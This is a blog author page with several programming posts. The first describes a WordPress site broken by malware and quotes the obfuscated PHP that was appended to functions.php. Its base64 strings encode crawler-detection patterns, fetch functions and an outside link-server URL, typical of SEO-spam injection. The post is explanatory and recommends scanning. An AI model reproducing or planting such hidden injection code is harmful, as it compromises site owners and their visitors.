All posts by dhiraj

Garbage code because of malware on your wordpress website

Recently one of my friends called me with a problem. He was not able to access his WordPress website, not even WordPress admin. He was afraid that his website was compromised and hacked.

When I opened his website, I saw a random PHP code on display. Something like this –

<!--? function _1634693657($i){$a=Array('I' .'2dvb2d' .'sZSN' .'p','I' .'21zbmJvdCNp','I2' .'Jpbmcja' .'Q==','I' .'3N' .'s' .'dX' .'J' .'wI' .'2k' .'=','' .'I2FzayN' .'p','I3N' .'lem5hbSNp','I2Fs' .'d' .'G' .'F2aXN0Y' .'SNp','SFRU' .'UF9VU0VSX0FHRU5U','aHR0cDov' .'Lw==','','SFRU' .'UF9IT1N' .'U','UkVRVUVT' .'V' .'F' .'9' .'VUkk=','aHR0cHM6Ly8=','','' .'d3d3Lg' .'==','','c' .'WRu','aHR0cDov' .'L2NoZWNraW5' .'nbG' .'l' .'u' .'a3MuY29t' .'L' .'2Nvb' .'n' .'Rl' .'bnRzL2xp' .'b' .'mtzaW4uc' .'GhwP21kN' .'T0=','JnVhPQ==','' .'SFRUUF9VU0VS' .'X0FHRU5U','JnJl' .'Zj0=','SFRUU' .'F' .'9S' .'RUZFUkVS','Jm' .'lw' .'PQ' .'==','UkV' .'NT' .'1R' .'FX0FERFI=','JnV' .'ya' .'T0' .'=','' .'UkVRVUVTVF9' .'VUkk=','Y' .'3VybF9' .'pb' .'ml0','YWxsb' .'3' .'dfdXJs' .'X' .'2' .'Zv' .'cGVu','Z' .'m' .'lsZV9nZXRfY' .'29u' .'dGV' .'udHM' .'=','' .'Zm' .'9w' .'ZW' .'4=','c' .'g' .'==','IyguK' .'j4' .'pKFt' .'ePD5dKikoPC4qKSNVc20' .'=','IzxccypzY' .'3JpcHQuKn' .'Njc' .'m' .'lwdFxzK' .'j' .'4jVXNt','','' .'Izx' .'ccypzdHl' .'sZS4qc3R5b' .'GVccy' .'o+I1VzbQ==','','Iz' .'xc' .'cyphL' .'iphXHMqPi' .'N' .'Vc20=','','Izx' .'ccypoZWFk' .'LipoZWFkXHMqP' .'iNVc' .'20=','','Izxcc' .'yp0aX' .'R' .'s' .'Z' .'S4qd' .'Gl0' .'bGV' .'cc' .'yo+I1VzbQ' .'==','','IA==','c3' .'lzdGVt' .'X2J1ZmZlc' .'l9iYWNrX3Nvcn' .'Q=','IA' .'==','','Lg' .'=' .'=','LA' .'=' .'=','IQ' .'=' .'=','Pw=' .'=','' .'Og==','IA' .'==','IA==','' .'IA==','I' .'y' .'g' .'8XHMqL2Jv' .'ZHlccyo+fDxcc' .'yovaH' .'R' .'tbF' .'xzK' .'j4' .'pI2k=','IA' .'==','' .'Cg=' .'=','I' .'A' .'==','c3lzd' .'GVtX2J1ZmZ' .'l' .'cl9' .'iY' .'WN' .'r');return base64_decode($a[$i]);} ?-->

As I wasn’t fully convinced of hacking I thought of it may be because of any virus or malware, after a bit investigation and found that the WordPress website is trying to load but dying while loading functions.php in “wp-includes”. I asked him to check the file and he confirmed that the whole garbage code is written at the end of functions.php file.

Now it was confirmed that it was a malware attack. I asked hit to get his hosting scanned properly and get rid of any malware present. I hope this will help you if you face same kind of problem.

Also for precautionary measures, you can install some security scrutiny plugin, which will also detect malware, if present.

For example,

https://wordpress.org/plugins/sucuri-scanner/

https://wordpress.org/plugins/quttera-web-malware-scanner/

So you think you can code! Basic programming requirements

Every programmer requires some basic preparation to take up programing challenges. Programming is not about rotting the functions and syntax of any language. You need to understand basic work flow of web (considering you are web programmer). Everytime you go to solve any issue, you need some basic skills to understand it, design and code a solution for it and successfully implement on server. Here is list of basic skills that everyone requires.

  • Learn how to use Git and GitHub
  • Learn simple linux regular expressions.
  • Find a site with a few interview programming questions, and practice going through the full answer, with code, for some of them (a few a day should be good; do them in a language you don’t know well if you already can ace most).
  • Set up a crawler that can scrape some webpages and parse some basic data.
  • Set up a bigger crawler that has to fill out a form or two.
  • Program a basic linear algebra library (matrices, vectors, multiplication)
  • Learn how to use list comprehensions in python.
  • Read manual for your favourite language. This will help to get your fundamentals clear.
  • Get a stackoverflow account and learn to use the site. If you don’t at least know that StackOverflow is an available resource, and you’re an english-speaking programmer, you’re doing it wrong.
  • Implement a simple Machine learning algorithm on your own, with a whole pipeline. I.e. you read a simple input csv, split it into training and test set, run a simple algorithm with readily-tuneable or explorable hyperparameters, and a simple output of relevant statistics.
  • Learn the how to make a simple line graph in Excel, and make sure you can do it right; i.e. properly labeled axes and tick marks, title and legends.
  • Learn how to make a simple line graph in something other than Excel. Make sure you can do it right (same requirements).
  • Learn the basic functionality of a NoSQL database; (you can learn a big chunk of mongoDB in a day)
  • Learn the most basic functionality of SQL (you don’t need to be a query guru,  but have a small clue about it).
  • Learn a tool for in-depth parsing of HTML and XML
  • Implement a list-of-lists graph data structure
  • Implement random walk, PageRank, clustering coefficient finding (#triangles over possible triangles) and common neighbor number finding.
  • Implement BFS, DFS, Shortest Path, topological sort and Minimum Spanning Tree (bonus for union-find version). Take a couple days if you have no algorithms background.

May the power be with you 🙂

Filters in Yii

Yii FiltersFilter is a piece of code that is configured to be executed before and/or after a controller action executes. For example, an access control filter may be executed to ensure that the user is authenticated before executing the requested action; a performance filter

may be used to measure the time spent executing the action.
An action can have multiple filters. The filters are executed in the order that they appear in the filter list. A filter can prevent the execution of the action and the rest of the unexecuted filters.
There are two types of filter

Continue reading Filters in Yii

How to read files in PHP

There are many options are available when it comes to file processing with PHP. Each option has its own importance. We will discuss some of the functions related to file processing, such as fopen, fclose, feof, file, file_get_contents etc. We will also discuss, when we should use which function, because it always depends on the goal of parsing the file.

Continue reading How to read files in PHP

How to create a Simple Php Contact form

Here I am going to discuss a most common and necessary component which everyone requires for their blog or website, which is a contact-us form. Below you will find the code of a simple contact form. Also, I will discuss how to create the form and handle its submission. Generally We require that when someone is filling the form, its information will be either stored in a database or will be mailed to a given email address. In this post, we will only discuss the email part. You are welcome to modify and store the information in database with very small tweaks.

Let’s start..!! We need files, one to display the form and other one to capture its submission:

  • contact.php : this will contain the html code for the contact form.
  • process.php : this file will have necessary php cods for handling the above contact form.

//

Continue reading How to create a Simple Php Contact form